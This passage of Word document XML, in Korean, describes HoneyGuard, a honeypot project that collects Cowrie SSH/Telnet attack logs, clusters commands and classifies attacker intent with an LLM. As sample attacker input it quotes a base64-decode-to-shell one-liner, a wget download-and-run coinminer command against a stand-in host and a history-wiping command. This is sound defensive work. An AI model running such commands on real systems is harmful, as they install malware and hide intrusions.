              </w:rPr>
              <w:t>기존 허니팟</w:t>
            </w:r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  <w:t>Cowrie 단독, T-Pot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  <w:t>가짜 서버로 침투를 유도하여 원시 JSON 파일로 기록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line="276" w:lineRule="auto" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">수만 건의 봇넷 로그가 텍스트로 방치되어 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>관리자가 수동으로 분석해야 하는 한계</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.2 수집 구간의 결정적 차이: 운영 서버 내부 vs 인터넷 최외곽 미끼 서버</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="288"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="14" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[글로벌 인터넷 공격자]</w:t>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ├──▶ [우리 시스템: 허니팟 미끼 서버] ◀◀◀ ★【수집 구간: 외부 격리 DMZ】★</w:t>
        <w:br/>
        <w:t xml:space="preserve">         │     (운영망과 100% 격리된 가짜 EC2)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         │     - 실제 운영 서버에 에이전트 설치 0% (부하/장애 위험 0%)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         │     - 해커의 공격 수법(명령어, 패스워드)을 안전하게 선제 파악</w:t>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
        <w:br/>
        <w:t xml:space="preserve">         └──▶ [진짜 운영 서버 (고객 DB, 결제 시스템)] ◀◀◀ 【AV / EPP / EDR / SIEM의 수집 구간】</w:t>
        <w:br/>
        <w:t xml:space="preserve">               (해커가 여기까지 도달하면 이미 사고 직전)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               - 서버 내부에 무거운 에이전트 설치, 리소스 소모 및 충돌 위험</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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기존 솔루션(AV/EPP/EDR/SIEM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">: 진짜 고객 데이터가 돌아가는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>운영 서버 내부</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>에서 도둑과 육탄전을 벌임. 서버 성능을 갉아먹고, 업데이트 충돌 시 운영 서버가 마비되는 위험이 존재함.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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우리 시스템</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">: 운영 서버에는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>단 1바이트의 프로그램도 설치하지 않음 (Zero Impact)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">. 인터넷 최외곽에 가짜 서버를 배치해 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>무피해 상태로 공격자의 패스워드와 최신 공격 명령어를 엿보는 선제적 첩보(CTI) 시스템</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>임.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.3 우리 시스템(HoneyGuard)만의 3대 기술적 차별점</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="288"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="14" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>flowchart LR</w:t>
        <w:br/>
        <w:t xml:space="preserve">    A["공격 로그 수집 (Cowrie)"] --&gt; B["cmd_hash 정규화 군집화"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    B --&gt; C["Claude Haiku 런타임 시맨틱 분석"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    C --&gt; D["Streamlit 6개 탭 실시간 시각화"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    B -.-&gt;|비용 99% 절감| C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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시그니처 매칭 한계를 깬 "LLM 런타임 시맨틱(Semantic) 분석"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">   - `echo "d2dldCAuLi4=" | base64 -d | sh` 와 같이 난독화된 쉘 스크립트의 실행 맥락을 역추적하여, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>6종 의도(코인채굴, 봇넷가담, 정찰, 자격증명탈취, 랜섬웨어, 기타)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>심각도(1~5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>를 자동 산출.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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`cmd_hash` 정규화 클러스터링을 통한 AI 비용 99% 절감</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 반복되는 봇넷 명령어를 정규화하여 `cmd_hash`를 생성하고, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>동일 해시 세션군 중 대표 1건만 Claude Batch API로 일괄 분석</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>한 뒤 결과를 매핑하여 API 비용을 수십 원 수준으로 통제.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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듀얼 리전 및 프로토콜 교차 실증 (Cross-Comparison CTI)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">   - AWS 서울 vs 버지니아 리전 비교를 통한 글로벌 무차별 스캔 검증.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">   - SSH(인프라 자원 탈취) vs Telnet(IoT 봇넷 감염) 프로토콜별 위협 벡터 비교 실증.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>4. 시스템 아키텍처 및 파이프라인</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="288"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="14" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sequenceDiagram</w:t>
        <w:br/>
        <w:t xml:space="preserve">    autonumber</w:t>
        <w:br/>
        <w:t xml:space="preserve">    actor Attacker as 공격자 (인터넷)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant Sensor as 센서 EC2 (서울/버지니아)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant Engine as 분석 서버 (ETL 파이프라인)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant DB as PostgreSQL (Supabase)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant AI as Claude Haiku (Batch API)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant UI as Streamlit 대시보드</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Attacker-&gt;&gt;Sensor: SSH(22) / Telnet(23) 무차별 침투 시도</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Sensor-&gt;&gt;Sensor: Cowrie 컨테이너가 원시 로그 기록 (cowrie.json)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Engine-&gt;&gt;Sensor: 관리 포트(62222) rsync Pull (비동기 수집)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Engine-&gt;&gt;Engine: parse_pipeline.py 실행 (이벤트 분기 &amp; cmd_hash 정규화)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Engine-&gt;&gt;DB: PostgreSQL 7개 테이블에 Upsert (멱등성 보장)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    AI-&gt;&gt;DB: 미분석 고유 cmd_hash 대표 1건 조회 (RPC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    AI-&gt;&gt;DB: 의도(6종), 심각도(1~5), TTP 적재 (ai_analysis)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    UI-&gt;&gt;DB: SQL RPC 집계 함수 호출 (.rpc())</w:t>
        <w:br/>
        <w:t xml:space="preserve">    UI-&gt;&gt;UI: 6개 관제 페이지 렌더링 (localhost:8501)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>5. 코드 레벨 공격 탐지 메커니즘 및 로컬 검증 결과</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5.1 코드 레벨 탐지 구현부 (`collector/parse_pipeline.py`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="288"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="14" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:shd w:fill="F8F9FA"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># [84~91행] 무차별 대입(Brute Force) 공격 판정</w:t>
        <w:br/>
        <w:t>elif eid in ("cowrie.login.success", "cowrie.login.failed"):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rows["auth_attempts"].append(key | {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "eventid": eid,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "username": ev.get("username"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "password": ev.get("password"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "success": eid == "cowrie.login.success",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "ts": ts,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    })</w:t>
        <w:br/>
        <w:br/>
        <w:t># [92~93행] 침투 후 악성 명령어 실행 공격 판정</w:t>
        <w:br/>
        <w:t>elif eid in ("cowrie.command.input", "cowrie.command.failed"):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rows["commands"].append(key | {"eventid": eid, "input": ev.get("input") or "", "ts": ts})</w:t>
        <w:br/>
        <w:br/>
        <w:t># [94~100행] 악성 파일 다운로드 시도 감지</w:t>
        <w:br/>
        <w:t>elif eid == "cowrie.session.file_download":</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rows["downloads"].append(key | {"eventid": eid, "url": ev.get("url"), ...})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5.2 로컬 드라이 런 검증 결과 (`collector/samples/sample_cowrie.json`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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세션 접속 (`sessions_open: 1`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>: 해커 IP `185.220.101.5`의 침투 세션 감지.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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비밀번호 공격 (`auth_attempts: 2`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>: `admin/123`(실패) 및 `root/password123`(성공) 시도 분리 파싱.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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명령어 실행 (`commands: 2`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">  1. `cd /tmp; wget http://malware.com/coinminer; chmod +x coinminer; ./coinminer` (코인 채굴기 설치/실행)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">  2. `history -c` (명령어 입력 흔적 삭제)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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검증 성과</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>: 서버 배포 전 로컬 환경에서 파서 무결성 및 DB 멱등성(중복 적재 방지) 검증 완료.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